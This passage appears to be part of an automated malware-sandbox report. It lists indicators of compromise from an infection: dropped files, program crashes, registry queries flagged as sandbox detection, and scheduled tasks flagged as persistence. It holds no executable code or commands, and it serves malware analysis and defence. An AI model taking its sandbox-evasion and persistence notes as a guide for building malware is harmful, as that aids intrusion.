(x86)\FarLabUninstaller\is-KKVLO.tmp setup_2.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-4MR9H.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\FarLabUninstaller\Cilezhaetotae.exe Conhost.exe -
Drops file in Windows directory 27 IoCs
Processes:
msiexec.exeMsiExec.exedescription ioc process File opened for modification C:\Windows\Installer\MSI64BD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID9A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI13E5.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DF6137C8B3AFD96084.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI64AD.tmp msiexec.exe File opened for modification C:\Windows\Installer\3efb0.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI527B.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File created C:\Windows\Installer\3efb0.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI1173.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4162.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4BC3.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\Installer\MSI8B33.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF300DE076B3EF369E.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI93FE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI16A5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1C72.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5A4C.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF108FF7F500FFF265.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI6ED1.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF1BC4CAE2522BC790.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI22AD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFCFF.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 38 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4692 3488 WerFault.exe Wed15ac1df9305ded09.exe 4544 1176 WerFault.exe ShadowVPNInstaller_t1.exe 572 2520 WerFault.exe Wed15bfd6504f7748c.exe 1600 5028 WerFault.exe Wed15edb855a49.exe 2424 1176 WerFault.exe ShadowVPNInstaller_t1.exe 5500 1176 WerFault.exe ShadowVPNInstaller_t1.exe 5896 5640 WerFault.exe Firstoffer.exe 4876 1176 WerFault.exe ShadowVPNInstaller_t1.exe 4948 664 WerFault.exe setup.exe 4412 1176 WerFault.exe ShadowVPNInstaller_t1.exe 716 2896 WerFault.exe rundll32.exe 6152 5216 WerFault.exe hx8zKDisWjElqWnOPvs7qHfF.exe 6108 6464 WerFault.exe 9DozPzDynjFKwiIswvyuxQd7.exe 812 4768 WerFault.exe dK4GoEA4II29LNHp3L6J1CN8.exe 7364 6052 WerFault.exe eRSVwarLdW_vKn04ZbdisJ63.exe 4940 5472 WerFault.exe YRuFLQioz9k_aCvbJINamAn1.exe 6592 3756 WerFault.exe ycWCTC54TlrQm0mZXPsuqm8m.exe 2072 1176 WerFault.exe ShadowVPNInstaller_t1.exe 6152 1176 WerFault.exe ShadowVPNInstaller_t1.exe 6256 6164 WerFault.exe Otkl2w3MYaOYZNGLpudAaCMk.exe 4328 3728 WerFault.exe GcleanerEU.exe 7028 5660 WerFault.exe 9IjMd5iOi77WqNnRpTgopX7E.exe 6820 1176 WerFault.exe ShadowVPNInstaller_t1.exe 6808 1176 WerFault.exe ShadowVPNInstaller_t1.exe 1540 2792 WerFault.exe rundll32.exe 7072 2844 WerFault.exe gcleaner.exe 2868 1176 WerFault.exe ShadowVPNInstaller_t1.exe 7320 1176 WerFault.exe ShadowVPNInstaller_t1.exe 6148 3532 WerFault.exe C1FB.exe 5440 1176 WerFault.exe ShadowVPNInstaller_t1.exe 6800 1176 WerFault.exe ShadowVPNInstaller_t1.exe 7400 1176 WerFault.exe ShadowVPNInstaller_t1.exe 6648 8020 WerFault.exe 4007.exe 8320 16132 WerFault.exe GcleanerEU.exe 8820 8728 WerFault.exe rundll32.exe 9056 2484 WerFault.exe gcleaner.exe 14380 14112 WerFault.exe InternodesPiets_2021-09-29_21-00.exe 8200 1324 WerFault.exe 35BC.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exevssvc.exe184C.exespcXk4nVIHzYkQq80aGWITZP.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000312b64fa169c92a50000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000400600000000ffffffff000000002700010000080000312b64fa00000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005006000000000000a0f93f000000ffffffff000000000701010000280300312b64fa00000000000050060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000312b64fa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000312b64fa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 184C.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI spcXk4nVIHzYkQq80aGWITZP.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI spcXk4nVIHzYkQq80aGWITZP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\FriendlyName svchost.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe7Ga22DMpgGLNmIcC0zmTTu3r.exeBuhinylaco.exeWerFault.exeWerFault.exeVC_redist.x86.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 7Ga22DMpgGLNmIcC0zmTTu3r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Buhinylaco.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 VC_redist.x86.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz VC_redist.x86.exe -
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 8100 schtasks.exe 8152 schtasks.exe 2508 schtasks.exe 6408 schtasks.exe 8116 schtasks.exe 8168 schtasks.exe 7500 schtasks.exe 5852 schtasks.exe 6628 schtasks.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
Processes:
